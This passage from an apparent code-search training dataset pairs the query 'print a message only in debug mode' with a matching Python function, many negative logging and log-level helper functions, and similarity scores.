self.logger.log(lvl, msg)", "def log_msg(level, msg):\n now = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime())\n level = (level+' '*5)[:5]\n msg = msg.replace('\\r', '').replace('\\n', '|')\n\n line = '[{}][{}]: {}\\n'.format(now, level.upper(), msg)\n with open(CONFIG['reportFile'], 'a') as logfp:\n logfp.write(line)", "def log(self, level, msg, *args, **kwargs):\n logging.Logger.log(self, level, '%s::%s'%(self.name, msg), *args, **kwargs)", "def log(self, msg, level=1):\n if self.verbosity >= level:\n print(msg)", "def log(level, message, args=()):\n\tif level >= minimumLogLevel:\n\t\ttry:\n\t\t\tif args:\n\t\t\t\tmessage = message % args\n\t\t\tif level >= screenLogLevel:\n\t\t\t\tlogToScreen(message)\n\t\t\tif level >= fileLogLevel:\n\t\t\t\tLEVEL_PREFIXES = (\n\t\t\t\t\t\"DEBUG: \",\n\t\t\t\t\t\"INFO : \",\n\t\t\t\t\t\"WARN : \",\n\t\t\t\t\t\"ERROR: \",\n\t\t\t\t)\n\t\t\t\tlogToFile(LEVEL_PREFIXES[level] + message)\n\t\texcept UnicodeError:\n\t\t\tpass", "def log(self, msg, level=\"INFO\"):\n if level in ['ERROR', 'CRITICAL']:\n outfunc = sys.stderr.write\n else:\n outfunc = print\n\n # TODO stderr for level = \"ERROR\"\n log_time = datetime.utcnow().strftime(\"%Y-%m-%d %H:%M:%S\")\n level_just = level.ljust(10)\n msg = f\"{log_time} {level_just}{msg}\"\n outfunc(msg)", "def log(level, msg):\n weight = \"?\"\n if level>=LOG_LEVEL:\n if level == 0:\n weight = \"DEBUG\"\n elif level == 1:\n weight = \"INFO\"\n elif level == 2:\n weight = \"WARN\"\n elif level == 3:\n weight = \"ERROR\"\n else:\n log(3, \"Invalid log level: {0}\".format(level))\n print(\"{0}: {1}\".format(weight, msg))", "def log(self, msg, level='INFO'):\n if level == Logger.DEBUG:\n self.__logger.debug(msg)\n elif level == Logger.INFO:\n self.__logger.info(msg)\n elif level == Logger.WARN:\n self.__logger.warning(msg)\n elif level == Logger.ERROR:\n self.__logger.error(msg)\n elif level == Logger.CRITICAL:\n self.__logger.critical(msg)\n else:\n pass", "def log( self, level, msg, *args, **kwargs ):\n if self.isEnabledFor( level ):\n msg, kwargs = self.process( msg, kwargs )\n self.logger._log( level, Message( msg, args ), (), **kwargs )", "async def log(self, message, level=logging.INFO):\n\t\tawait self.handle_log(LogEntry(level, self.name, message))", "async def loglevel(self, ctx, level):\n level = level.lower()\n assert level in LEVELS\n await self.bot.log.change_level(LEVELS[level], ctx.author.name)\n await ctx.send(f\"Set log level to {level.upper()}\")", "def logWithLevel(level:int, message:Any, showStackTrace:bool = False, stackOffset:int = 0) -> None:\n\t\t# TODO add a parameter frame substractor to correct the line number, here and in In _log()\n\t\t# TODO change to match in Python10\n\t\tlevel == logging.DEBUG and Logging.logDebug(message, stackOffset = stackOffset)\n\t\tlevel == logging.INFO and Logging.log(message, stackOffset = stackOffset)\n\t\tlevel == logging.WARNING and Logging.logWarn(message, stackOffset = stackOffset)\n\t\tlevel == logging.ERROR and Logging.logErr(message, showStackTrace = showStackTrace, stackOffset = stackOffset)", "def log(self, log_level, text):\n timestamp = '['+str(datetime.datetime.now())+']'\n if log_level == self.ERROR:\n if self.verbose >= self.ERROR:\n print(\"ERROR :\", timestamp, \":\", str(text), file=sys.stderr)\n return\n\n if log_level == self.WARNING:\n if self.verbose >= self.WARNING:\n print(\"WARN :\", timestamp, \":\", str(text), file=sys.stderr)\n return\n\n if log_level == self.INFO:\n if self.verbose >= self.INFO:\n print(\"INFO :\", timestamp, \":\", str(text), file=sys.stderr)\n return\n\n if log_level == self.DEBUG:\n if self.verbose >= self.DEBUG:\n print(\"DEBUG :\", timestamp, \":\", str(text), file=sys.stderr)\n return", "def write(self, message: str, level: LogLevel) -> None:\n if level >= self.min_level:\n self.stream.write(message)", "def set_level(self, level: str):\n self._logger.setLevel(getattr(logging, level))", "def message(self, m : str , level = logging.INFO):\n\n if level == logging.DEBUG:\n self.logger.debug(m)\n elif level == logging.INFO:\n self.logger.info(m)\n elif level == logging.ERROR:\n self.logger.error(m)", "def _log(level:int, msg:Any, stackOffset:int = 0) -> None:\n\t\tif Logging.logLevel <= level:\n\t\t\ttry:\n\t\t\t\t# Queue a log message : (level, message, caller from stackframe, current thread)\n\t\t\t\tcaller = inspect.getframeinfo(inspect.stack()[stackOffset + 2][0])\n\t\t\t\tthread = threading.current_thread()\n\t\t\t\tif Logging.enableQueue:\n\t\t\t\t\tLogging.queue.put((level, msg, caller, thread))\n\t\t\t\telse:\n\t\t\t\t\tif msg:\n\t\t\t\t\t\tLogging._logMessageToLoggerConsole(level, msg, caller, thread)\n\t\t\texcept Exception as e:\n\t\t\t\tprint(e)\n\t\t\t\t# sometimes this raises an exception. Just ignore it.\n\t\t\t\tpass", "def log(self, level, message, *args, **kwargs):\n if not self.isEnabledFor(level):\n return\n\n message = message.strip()\n message, kwargs = self.process(message, kwargs)\n\n app_id = self.extra['app_id']\n version = self.extra['version']\n\n if cloud_logger_bg is not None:\n # The following usage is highly unconventional:\n # There appears to be no way to log a structured log message\n # asynchronously using the cloud logging client properly.\n # However, internally, the library uses structured logging. As long\n # as we queue the right payload into the worker's queue, we're OK.\n # This works well with google-cloud-logging==1.9.0.\n # It looks shady, but the only decent way to use the async logging\n # support for Stackdriver.\n cloud_logger_bg.worker._queue.put_nowait(\n {\n 'info': {\n 'app_id': app_id,\n 'version': version,\n 'message': message,\n 'level': getLevelName(level)\n },\n 'severity': getLevelName(level),\n 'resource': Resource(type='global', labels={})\n }\n )\n\n message_pretty = f'{app_id}::{version} => {message}'\n self.logger.log(level, message_pretty, *args, **kwargs)", "def log( cls, level, msg, *args, **kwargs ):\n arg_set = ( level, msg, ) # not clear how to get rest, for now discard\n print( f\"{arg_set[0]} >> {arg_set[1]}\" )\n cls.__log_later.append( arg_set )", "def log_lvl(lvl):\n logs.set_level(logging.getLogger(\"plysp\"), lvl)", "def log(self, level, msg, *args, **kwargs):\n if self.isEnabledFor(level):\n msg, kwargs = self.process(msg, kwargs)\n if (args and len(args) == 1 and isinstance(args[0], Mapping) and args[0]):\n ns = args[0]\n else:\n ns = kwargs\n if args:\n ns['args'] = args\n msg = eval(f'f\"\"\"{msg}\"\"\"', globals(), ns)\n args = ()\n if 'stacklevel' not in kwargs:\n kwargs['stacklevel'] = 3\n kwargs.setdefault('extra', {}).update(topic=self.topic, agent=self.agent,\n context=self.context)\n self.logger.log(level, msg, *args, **{k: v for k, v in kwargs.items()\n if k in ['exc_info', 'stack_info',\n 'stacklevel', 'extra']})", "def TeeLog(self, msg=None, level=0):\n\n if msg != None:\n print(msg)\n logging.info(msg) if level == 0 else logging.warning(msg)", "def level(self, log_level):\n self.logger.setLevel(log_level)", "def emit(self, record):\n try:\n self.MAP[record.levelno](\"%s: %s\" % (record.name, record.msg))\n except KeyError:\n rospy.logerr(\"unknown log level %s LOG: %s: %s\" %\n (record.levelno, record.name, record.msg))", "def log(logger, level, message):\n\n if logger.parent.name != 'root':\n logger.log(level, message)\n else:\n print(message, file=sys.stderr)", "def set_level(self, level: LogLevel):\n pass", "def log_msg(level, msg):\n logger = RUN_CONFIG.get('logger')\n if logger is None:\n print(level, ':', msg)\n else:\n gunicorn_logger = logging.getLogger(logger)\n\n if level == DEBUG:\n gunicorn_logger.debug(msg)\n elif level == INFO:\n gunicorn_logger.info(msg)\n elif level == WARNING:\n gunicorn_logger.warning(msg)\n elif level == ERROR:\n gunicorn_logger.error(msg)\n elif level == CRITICAL:\n gunicorn_logger.critical(msg)", "def handle_log(self, workunit, level, *msg_elements):\r\n if level <= self.settings.log_level:\r\n self.do_handle_log(workunit, level, *msg_elements)", "async def log(self, message, level=logging.INFO):\n\t\tif self.log_queue is not None:\n\t\t\tawait self.log_queue.put(LogEntry(level, self.modulename, message))\n\t\telse:\n\t\t\tprint(str(LogEntry(level, self.modulename, message)))", "def l(msg, loglvl=0xFFFFFF):\n global LOG_LEVEL\n if (loglvl & LOG_LEVEL) != 0x0:\n print time.ctime(), ': ' , str(msg)", "def item_log(level, message, attachment=None):\n logger.write(message, level, attachment=attachment)", "def log(level=EVENT_LEVELS.Info, usr=None, msg=''):\n level = level if level in EVENT_LEVELS else EVENT_LEVELS.Info\n usr = None if usr.is_anonymous else usr\n\n if level in log_levels:\n print(f\"{level} Log: {usr} - {msg}\")\n EventLog.objects.create(\n user=usr,\n level=level,\n message=msg\n )", "def set_logging_level(self, level):\n if str(level) == '1':\n self.logging_level = logging.DEBUG\n elif str(level) == '2':\n self.logging_level = logging.INFO\n elif str(level) == '3':\n self.logging_level = logging.WARNING\n elif str(level) == '4':\n self.logging_level = logging.ERROR\n elif str(level) == '5':\n self.logging_level = logging.CRITICAL", "def set_log_level(self, level):\n if level == 'info':\n level = logging.INFO\n if level == 'debug':\n level = logging.DEBUG\n if level == 'error':\n level = logging.ERROR\n self._log.setLevel(level)", "def log(level: str, *messages: str) -> None:\n for message in messages:\n getattr(logger, level)(message)", "def __call__(self, msg=None, level=None):\n\n # get level to log at\n if level is None:\n level = self.level\n\n # are we going to log?\n if level < self.level:\n return\n\n if msg is None:\n msg = ''\n\n # get time\n to = datetime.datetime.now()\n hr = to.hour\n min = to.minute\n sec = to.second\n msec = to.microsecond\n\n # caller module and line number\n (fname, lnum) = self.caller_info()\n\n # get display string for log level\n loglevel = LevelNumToName[level]\n\n # write log message, then flush write to disk (maybe)\n fname = fname[:self.max_name_len]\n self.logfd.write('%02d:%02d:%02d.%06d|%8s|%*s:%-4d|%s\\n'\n % (hr, min, sec, msec, loglevel,\n self.max_name_len, fname, lnum, msg))\n self.logfd.flush()", "def log(self, level, *msg_elements):\r\n self.report.log(self._threadlocal.current_workunit, level, *msg_elements)", "def debug(self, level, *args):\n try:\n basestring\n except NameError:\n basestring = str\n if isinstance(level, basestring):\n args = (level,) + args\n level = 1\n self.mylog.log(logging.DEBUG - level + 1, *args)", "def set_logging_level(self, level):\n return self.sdk.set_logging_level(\n level,\n prefix=self.__class__.__name__,\n )", "def log_to_user(self, level, message):\n if level in ('error', 'info',):\n buffer = self.log_view.get_buffer()\n iter = buffer.get_end_iter()\n buffer.insert(iter, message + '\\n')\n adj = self.log_view.get_parent().get_vadjustment()\n adj.set_value(adj.get_upper() - adj.get_page_size())", "def log(message, level=logLevel.INFO, *args):\n if not logLevel.hasMember(level):\n log(\"Unknown log level: %s\" % level, logLevel.WARN)\n level = logLevel.INFO\n if type(message) != list:\n message = [message]\n lines = []\n for m in message:\n lines += [line for line in str(m).splitlines() if line.strip()]\n if args:\n prefix = ' ' + ' '.join(['(%s)' % p for p in args])\n else:\n frm = inspect.stack()[1]\n mod = inspect.getmodule(frm[0])\n modname = getattr(mod, '__name__', 'main')\n prefix = ' (%s)' % modname\n if lines:\n dtime = datetime.now().strftime(DTFORMAT)\n out_message = \"%s (%s)%s %s\" % (dtime, logLevel.memberName(level),\n prefix, lines[0])\n for line in lines[1:]:\n out_message += \"\\n(==) %s\" % line\n out_message += \"\\n\"\n sys.stderr.write(out_message)", "def write_log(self, msg, level = \"DEBUG\"):\r\n if len(self.parent)> 13:\r\n spacer = \"\\t\"\r\n elif len(self.parent) < 8:\r\n spacer = \"\\t\\t\\t\"\r\n else:\r\n spacer = \"\\t\\t\"\r\n \r\n log = level + \"\\t\" + self.parent +spacer +str(msg)\r\n print(log)", "def write(\n self,\n message,\n level=None,\n color=None,\n light=None\n ) -> None:\n\n # Clean message\n message = str(message).rstrip()\n\n # Only log if there is a message (not just a new line)\n if message == \"\":\n return None\n\n # Autoset level if necessary\n if level is None:\n level = self.level\n\n # Convert string level to logging int\n if self._is_string(level):\n level = self._get_level(level)\n\n if level < self.level:\n return None\n\n # Output to with correct level\n if level == logging.DEBUG:\n def_color = \"BLUE\"\n def_light = True\n prefix = '*'\n self.logger.debug(message)\n elif level == logging.INFO:\n def_color = \"GREEN\"\n def_light = False\n prefix = '+'\n self.logger.info(message)\n elif level == logging.WARNING:\n def_color = \"YELLOW\"\n def_light = False\n prefix = '-'\n self.logger.warning(message)\n elif level == logging.ERROR:\n def_color = \"RED\"\n def_light = False\n prefix = '!'\n self.logger.error(message)\n elif level == logging.CRITICAL:\n def_color = \"RED\"\n def_light = True\n prefix = '!'\n self.logger.critical(message)\n else:\n raise Exception('Invalid log level')\n\n if color is None:\n color = def_color\n if light is None:\n light = def_light\n\n # Output to CLI if cli flag is set\n if self.cli:\n self._write_cli(prefix, message, color, light)", "def _log(level: 'CdmStatusLevel', ctx: 'CdmCorpusContext', tag: str, message: str, path: str,\n default_status_event: Callable) -> None:\n # Write message to the configured logger\n if level >= ctx.report_at_level:\n timestamp = time_utils._get_formatted_date_string(datetime.utcnow())\n\n # Store a record of the event.\n # Save some dict init and string formatting cycles by checking\n # whether the recording is actually enabled.\n if ctx.events.is_recording:\n event = {\n 'timestamp': timestamp,\n 'level': level.name,\n 'tag': tag,\n 'message': message,\n 'path': path\n }\n if ctx.correlation_id is not None:\n event['correlationId'] = ctx.correlation_id\n ctx.events.append(event)\n\n formatted_message = _format_message(tag, message, path, ctx.correlation_id)\n\n if ctx and ctx.status_event:\n ctx.status_event(level, formatted_message)\n else:\n default_status_event(formatted_message)", "def setLogLevel(level):\n None", "def logecho(message, level='info'):\n if level == 'error':\n logger.error(message)\n click.echo(Fore.RED + level.upper() + ': ' + Fore.WHITE +\n message, err=True) if verbose else False\n elif level == 'warning':\n logger.warning(message)\n click.echo(Fore.YELLOW + level.upper() + ': ' +\n Fore.WHITE + message) if verbose else False\n elif level == 'debug':\n logger.debug(message)\n click.echo(Fore.GREEN + level.upper() + ': ' +\n Fore.WHITE + message) if debug else False\n else:\n logger.info(message)\n click.echo(message)", "def send_log(manager: SyslogManager, message: str, log_level: str):\n with manager.get_logger() as syslog_logger: # type: Logger\n if log_level == 'DEBUG':\n syslog_logger.debug(message)\n if log_level == 'INFO':\n syslog_logger.info(message)\n if log_level == 'WARNING':\n syslog_logger.warning(message)\n if log_level == 'ERROR':\n syslog_logger.error(message)\n if log_level == 'CRITICAL':\n syslog_logger.critical(message)", "def launch_log(level, message, attachment=None):\n logger.write(message, level, attachment=attachment, launch_log=True)", "def log(msg, loglevel, **kwargs):\n quit = kwargs.get('quit', False)\n return_code = kwargs.get('return_code', 0)\n confidential = kwargs.get('confidential', False)\n if confidential:\n handlers_loglevel = {}\n for handler in logger.handlers[1:]:\n handlers_loglevel[handler] = handler.level\n handler.setLevel('NONE')\n getattr(logger, loglevel)(msg)\n for handler, level in handlers_loglevel.items():\n handler.setLevel(level)\n else:\n getattr(logger, loglevel)(msg)\n\n if quit:\n sys.exit(return_code)", "def _set_logger(self, level):\n log.basicConfig(\n format='[%(asctime)s %(levelname)s]: %(message)s',\n level=log._nameToLevel.get(level.upper(), log.DEBUG))", "def _print(self, message, level, color):\n if (self.level >= level):\n sys.stdout.write(color)\n try: sys.stdout.write(\"%s\\n\" % message)\n except: sys.stdout.write(encode(\"%s\\n\" % message))\n sys.stdout.write(COLOR_RESET)\n sys.stdout.flush()\n return message", "def set_log_level(level):\n __log__.setLevel(level)", "def map_level(level):\n if level >= logging.ERROR:\n return 'error'\n elif level >= logging.WARNING:\n return 'warn'\n elif level >= logging.INFO:\n return 'info'\n return ''", "def log(self, message):", "def _set_logger(self, level):\n log.basicConfig(\n format='[%(levelname)s]: %(message)s',\n level=log._nameToLevel.get(level.upper(), log.DEBUG))", "def log_with_color(level):\n def wrapper(text, exc_info=False):\n #modified by zhengchun 20180607\n # color = log_colors_config[level.upper()]\n # getattr(logging, level.lower())(coloring(text, color))\n\n # fn, lno, func, sinfo = _findCaller(stack_info=False)\n # out_text=\"[F:\" + os.path.basename(fn) + \"] [M:\" + func + \"] [L:\" + str(lno) + \"] - \" + text\n sinfo=None\n f=sys._getframe().f_back\n out_text=\"[F:\" + os.path.basename(f.f_code.co_filename) + \"] [M:\" + f.f_code.co_name + \"] [L:\" + str(f.f_lineno) + \"] - \" + text\n if(exc_info):\n sio = io.StringIO()\n sio.write('Stack (most recent call last):\\n')\n traceback.print_stack(f, file=sio)\n sinfo = sio.getvalue()\n if sinfo[-1] == '\\n':\n sinfo = sinfo[:-1]\n sio.close()\n out_text += \"\\n\" + str(sinfo)\n\n getattr(logging, level.lower())(out_text)\n\n return wrapper", "def log(message, verbose=None, level=1):\n if verbose is None:\n verbose = GLOBAL_VERBOSE\n\n if verbose >= level:\n print(message)", "def log_level(given_level):\n if given_level not in constants.log_levels():\n raise argparse.ArgumentTypeError(\"Invalid log level given: \" + given_level)\n return given_level", "def log_msg(msg, loglevel=xbmc.LOGDEBUG):\n if isinstance(msg, unicode):\n msg = msg.encode('utf-8')\n if loglevel == xbmc.LOGDEBUG and FORCE_DEBUG_LOG:\n loglevel = xbmc.LOGNOTICE\n xbmc.log(\"%s --> %s\" % (ADDON_ID, msg), level=loglevel)", "def message(l_type, msg):\n if l_type == logging.INFO:\n logging.info(msg)\n print(msg)\n elif l_type == logging.WARNING:\n logging.warning(msg)\n elif l_type == logging.DEBUG:\n logging.debug(msg)", "def change_level(level):\n if 'debug' in level: LOG.setLevel(logging.DEBUG)\n elif 'info' in level: LOG.setLevel(logging.INFO)\n elif 'warning' in level: LOG.setLevel(logging.WARNING)\n elif 'error' in level: LOG.setLevel(logging.ERROR)\n elif 'critical' in level: LOG.setLevel(logging.CRITICAL)\n Logger.log('info', 'This logger changed the messages priority level to ', level)", "def log(cls, log_message, log_level):\n\n m = l = ''\n is_error = log_level == cls.LOG_LEVEL_ERROR\n\n if isinstance(log_message, GistException):\n log_message = log_message.to_json()\n m = log_message.get('app_message')\n l = '%s, File: %s - Line: %s' % (\n log_message.get('error_description'),\n log_message.get('filename'),\n log_message.get('line')\n )\n Logger.log(l, is_error)\n elif isinstance(log_message, ConnectionError):\n m = 'Apparently you are having problems with the internet connection'\n elif isinstance(log_message, Exception):\n exc_type, exc_value, exc_traceback = sys.exc_info()\n m = \"\"\"Apparently something is wrong with the plugin.\n Create a new issue with the log file content. Thanks!\"\"\"\n Logger.log(str(traceback.format_exception(exc_type, exc_value, exc_traceback)), is_error)\n\n elif isinstance(log_message, str):\n m = log_message\n\n cls.__show_app_message('Sync Settings: %s' % (m), log_level)", "def log(text='', level=1):\n\n if loglevel == 0 and adminlevel == 0:\n return 0 # not logged\n\n datetime = time.asctime(time.localtime(time.time()))\n threadname = threading.currentThread().getName()\n logtext = \"%s (%s)[%d]:%s\\n\" % (datetime,threadname,level,text)\n\n logged = 0 # flag if anything is logged\n\n if level > 0 and level <= loglevel:\n # log to logfile\n try:\n logf = open( logfile, 'a' )\n logf.write( logtext )\n logf.close()\n logged = logged + 1\n except IOError:\n # Cannot open logfile for writing - save this problem in adminlog\n logstr = \"<Log>log() - Log warning - cannot write to logfile '%s'\" % logfile\n print logstr\n datetime = time.asctime(time.localtime(time.time()))\n logtext = \"%s [%d]:%s\\n\" % (datetime,3,logstr)\n adminlog.append( logtext )\n\n if adminlevel > 0 and level <= adminlevel:\n # log to adminlog\n adminlog.append(logtext)\n logged = logged + 1\n\n return logged # 0=not logged, >0=logged", "def log(self, loglevel, logstring):\n # filter according to loglevel\n if self.loglevel >= loglevel:\n if loglevel == 0:\n output = \"[ERROR] \" + logstring\n elif loglevel == 1:\n output = \"[INFO] \" + logstring\n elif loglevel == 2:\n output = \"[DEBUG] \" + logstring\n elif loglevel == 3:\n output = \"[WTF] \" + logstring\n\n if self.logfile:\n self.logfile.write(logstring + \"\\n\")\n print(output)", "def _log(self, msg, mode=\"info\"):\n if mode == \"info\":\n self._logger.info(msg)\n elif mode == \"warning\":\n self._logger.warning(msg)", "def __log(self, msg: str, **kwargs: Any) -> None:\n self.logger.log(self.log_level, msg, **kwargs)", "def log(self, message: str):", "def log( self, message, level=None, sentry=False, tags=None ):\n # if no log level passed then use the current level\n if level == None:\n level = self.__logger.getEffectiveLevel()\n\n # get the stack less 1 place so we can report the actual log line and not the line in this function\n s = inspect.stack()[1]\n\n # if called form main then change the name of __main__ from <module> which is a little confusing\n func = s[3]\n if str( func ) == '<module>':\n func = '__main__'\n\n # get the line of code that's executing\n line = int( s[2] )\n\n # set the log level to the default if one is not provided\n if level == None:\n level = self.__logger.getEffectiveLevel()\n\n # if Sentry is and Sentry was defined when initialised then send the event to the Sentry server via the standard logger\n # processing along with any tags that might also have been passed in.\n if sentry and self.__sentry:\n self.__logger.log( level, '(%d)[sid=%s] %s:%d %s' % (\n os.getpid(),\n self.__sentry.get_ident(\n self.__sentry.captureMessage(\n message=message,\n level=level,\n tags=tags\n )\n ),\n func,\n line,\n message\n ) )\n else:\n # if Sentry was not set then log.\n self.__logger.log( level, '(%d) %s:%d %s' % ( os.getpid(), func, line, message ) )", "async def set_log_level(self, log_level: str) -> None:\n await self._send_message_get_response(OutgoingMessage(OutgoingMessageType.set_log_level, log_level=log_level))", "def log(level_str, sender, message):\n my_logger = logging.getLogger(__name__)\n # set strict_mode to default value, if not already set\n if not hasattr(log, \"strict_mode\"):\n log.strict_mode = False\n # - lookup table for internal strings to pretty output strings\n pretty_levels = {\n 'CRITICAL' : 'FATAL: ',\n 'ERROR' : 'ERROR: ',\n 'WARNING' : 'WARNING: ',\n 'INFO' : ' ',\n 'DEBUG' : ' ',\n 'NOTSET' : ' '\n }\n message = str(message)\n sender_str = ''\n message_str = ''\n level = LEVELS.get(level_str, LEVELS['ERROR'])\n # -- level\n pretty_level_str = pretty_levels.get(level_str, pretty_levels['ERROR'])\n # -- sender\n if sender != 'panzer':\n # sender_str = ' ' + sender + ': '\n sender_str = ' '\n # -- message\n message_str = message\n output = ''\n output += pretty_level_str\n output += sender_str\n output += message_str\n my_logger.log(level, output)\n # - if 'strict' mode and error logged, raise exception to exit panzer\n if log.strict_mode and (level_str == 'ERROR' or level_str == 'CRITICAL'):\n log.strict_mode = False\n raise error.StrictModeError", "def do_handle_log(self, workunit, level, *msg_elements):\r\n pass", "def log(msg, addr, level=0):\n # log levels\n # 0 - DEBUG\n # 1 - INFO\n # 2 - Warning\n # 3 - ERROR\n # 4 - WARNING\n\n fname = '{}_{}.log'.format(addr[0], str(addr[1]))\n logging.basicConfig(filename=fname, filemode='a', level=logging.DEBUG,\n format='%(asctime)s ; %(levelname)s ; %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p')\n if level==0:\n logging.debug(msg)\n elif level==1:\n logging.info(msg)\n elif level==2:\n logging.warning(msg)\n elif level==3:\n logging.error(msg)\n elif level==4:\n logging.warning(msg)\n else:\n logging.debug(msg)\n logging.debug('The level set is not there, it should be in [0,4]')", "def level_logging(self, level):\r\n\r\n # converts the provided logging level value (either string or\r\n # integer value) into the appropriate normalized value that can\r\n # be used internally for logging level setting\r\n level = self._level(level)\r\n\r\n # sets the (new) level value value for both the base stream\r\n # handler and also for the logger itself\r\n self.handler_stream.setLevel(level)\r\n self.logger.setLevel(level)\r\n\r\n # iterates over the complete set of attached handlers to\r\n # update their respective logging level\r\n for handler in self.handlers: handler.setLevel(level)", "def set_logger_level(lgr, level):\n if isinstance(level, int):\n pass\n elif level.isnumeric():\n level = int(level)\n elif level.isalpha():\n level = getattr(logging, level)\n else:\n lgr.warning(\"Do not know how to treat loglevel %s\" % level)\n return\n lgr.setLevel(level)", "def log(level: int, message: str, *args: Any) -> None:\n if level >= logging.ERROR:\n Logger.errors = True\n\n if len(args) > 0:\n try:\n message = message % args\n except TypeError:\n no_additional_complaints()\n raise RuntimeError( # pylint: disable=raise-missing-from\n f\"mismatch between format: {message} \" f\"and args: {args}\"\n )\n\n message = f\"{Invocation.current.log} - {message}\"\n Logger._logger.log(level, message)", "def log(self, message, log_level=\"info\"):\n for word in self.__ignore_output:\n while word in message:\n message = message.replace(word, \"\")\n getattr(logger, log_level)(\"{}{}\".format(self.__output_prefix, message.strip()))", "def print(self, level, message, *args):\r\n if level < self.level:\r\n return\r\n\r\n if args:\r\n message = message.format(*args)\r\n\r\n self._raw_insert(level, message)", "def log(\n message: str,\n application: str = \"Red Layer\",\n log_level: int = 0,\n push: bool = False,\n ):\n # send it to QGIS messages panel\n QgsMessageLog.logMessage(\n message=message, tag=application, notifyUser=push, level=log_level\n )\n\n # optionally, display message on QGIS Message bar (above the map canvas)\n if push:\n iface.messageBar().pushMessage(\n title=application, text=message, level=log_level, duration=(log_level+1)*3\n )", "def handle_log(self, api, command, level=None):\n level = command.get('level', level)\n if level is None:\n level = logging.INFO\n msg = command.get('msg')\n if msg is None:\n returnValue(self.reply(command, success=False,\n reason=\"Value expected for msg\"))\n if not isinstance(msg, basestring):\n msg = str(msg)\n elif isinstance(msg, unicode):\n msg = msg.encode('utf-8')\n yield self.log(api, msg, level)\n returnValue(self.reply(command, success=True))", "def log(level, logger_name, *msgs):\n logger = logging.getLogger(logger_name)\n for msg in msgs:\n if (msg != ''):\n logger.log(level, msg)", "def SetLoggingLevel(level):\n SetLogLevelCC(level)\n global logger\n logger.setLevel({\n 'DEBUG': logging.DEBUG,\n 'INFO': logging.INFO,\n 'WARNING': logging.WARNING,\n 'ERROR': logging.ERROR,\n 'FATAL': logging.CRITICAL\n }[level])", "def _get_log_level(level):\n # default to DEBUG\n if level is None or level == \"DEBUG\":\n return logging.DEBUG\n\n level = level.upper()\n # Make debugging configurable\n if level == \"INFO\":\n return logging.INFO\n elif level == \"WARNING\":\n return logging.WARNING\n elif level == \"CRITICAL\":\n return logging.CRITICAL\n elif level == \"ERROR\":\n return logging.ERROR\n elif level == \"FATAL\":\n return logging.FATAL\n else:\n raise Exception(\"UnknownLogLevelException: enter a valid log level\")", "def set_logging_to(level):\n scom.set_logging_to(level)", "def mlevel(level: Union[int, str]) -> int:\n try:\n if not level:\n raise KeyError\n return LOG_LEVELS[str(level).upper()]\n except KeyError:\n unique_set = set(\n [str(x) for x in list(LOG_LEVELS.keys())]\n + [str(x) for x in list(LOG_LEVELS.values())]\n )\n opts: str = \", \".join(sorted(list(unique_set)))\n raise ValueError(f\"Invalid log level: {level}. Available options: {opts}\")", "def log(self, log_level, client, msg):\n logger_dict = {\n 'CurrentTime': strftime(\"%a, %d %b %Y %X\", localtime()),\n 'ThreadName': threading.current_thread().getName()\n }\n if client == -1:\n formatted_message = msg\n else:\n formatted_message = '{0}: {1} {2}'.format(client[0], client[1], msg)\n\n # logging.debug('%s', utils.colorize_log(log_level, formatted_message), extra=logger_dict)", "def setLevel(level='info'):\n\n mapper = {\n 'critical' : logging.CRITICAL, \n 'error' : logging.ERROR,\n 'warning' : logging.WARNING,\n 'info' : logging.INFO,\n 'debug' : logging.DEBUG,\n }\n if level not in mapper:\n raise ValueError('level must be one of these: {}'.format(list(mapper.keys())))\n else:\n logger.setLevel(mapper[level])" ]
[ "0.81246626", "0.78997695", "0.78037274", "0.780287", "0.7799478", "0.77843386", "0.77657396", "0.77248126", "0.77185434", "0.7705718", "0.76910615", "0.7610388", "0.75899214", "0.7555818", "0.75395006", "0.74972963", "0.74645865", "0.7456792", "0.74560916", "0.7455943", "0.74517965", "0.74315274", "0.7425933", "0.7405377", "0.7266313", "0.7170448", "0.7078647", "0.70643526", "0.7008528", "0.7006272", "0.6992314", "0.69726485", "0.69462836", "0.69350195", "0.69215125", "0.69183284", "0.69125384", "0.69080484", "0.6896044", "0.6892852", "0.68894583", "0.6889306", "0.68828946", "0.6880664", "0.68168116", "0.6797881", "0.67750144", "0.67741156", "0.6767425", "0.676642", "0.67443514", "0.6736891", "0.6729394", "0.66940796", "0.6693995", "0.6693676", "0.6692919", "0.6659191", "0.66528565", "0.66519773", "0.6645216", "0.66377234", "0.66333026", "0.66264844", "0.6621791", "0.6584879", "0.657602", "0.65676725", "0.6564231", "0.6551886", "0.65499645", "0.65410405", "0.6540105", "0.6529414", "0.65291876", "0.65234315", "0.6522511", "0.65024763", "0.64855814", "0.6474124", "0.6455695", "0.64466625", "0.64292073", "0.64227575", "0.6419987", "0.64194745", "0.64142203", "0.6410922", "0.63983494", "0.6396401", "0.63803315", "0.6374585", "0.63683426", "0.636618", "0.6363434", "0.63466114", "0.6343556", "0.6341301", "0.6335866", "0.63312304" ]
0.68746495
44
Prints a message only when app is in debug mode
def print_debug(message): if current_app.debug: print(message)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def debug():\n assert current_app.debug == False, \"Don't panic! You're here by request of debug()\"", "def checkDebug(message):\n if debug == True:\n print(message)", "def debug(msg):\n if not DEBUG_ON:\n return\n print(\"DEBUG:\" + str(msg))", "def print_debug(msg):\n if IS_DEBUG:\n print(msg)", "def debug() -> bool:", "def DebugMessage(message=\"\"):\n if global_debug:\n print(\"\\033[93m DEBUG: \" + message + \"\\033[0m\")", "def debug(msg):\n if(CONFIG['debug']):\n logIt(msg)", "def check_and_print_debug_message(self, msg):\n if self._params.debug:\n print(\"Info: {}\".format(msg))", "def printdebug(self, msg):\n if self.debug > 0:\n print(msg)", "def debug(s):\n if app.config['DEBUG']:\n print(s)", "def debug(s):\n if app.config['DEBUG']:\n print(s)", "def debugLog(message):\n if debugFlag != None:\n print \"#debug: \" + str(message)", "def output_debug(text):\n if conf.debug:\n output_message('[DEBUG] ' + text)", "def main(debug):\n click.echo('Debug mode is {{}}'.format(debug))", "def cli(debug):\n print(f\"Debug mode is {'on' if debug else 'off'}\")", "def debug(msg):\n if settings.DEBUG:\n print \"DEBUG: cli.%(msg)s\" % locals()", "def debug(cls, msg, debug=True):\n if debug:\n Console.msg(msg)", "def debug(self, message):\r\n if self._debug:\r\n print('[Debug] %s' % message)", "def debugPrint(text: str):\r\n if DEBUG:\r\n print(text)", "def debug():", "def __debugInfo(self, msg):\n\t\tif 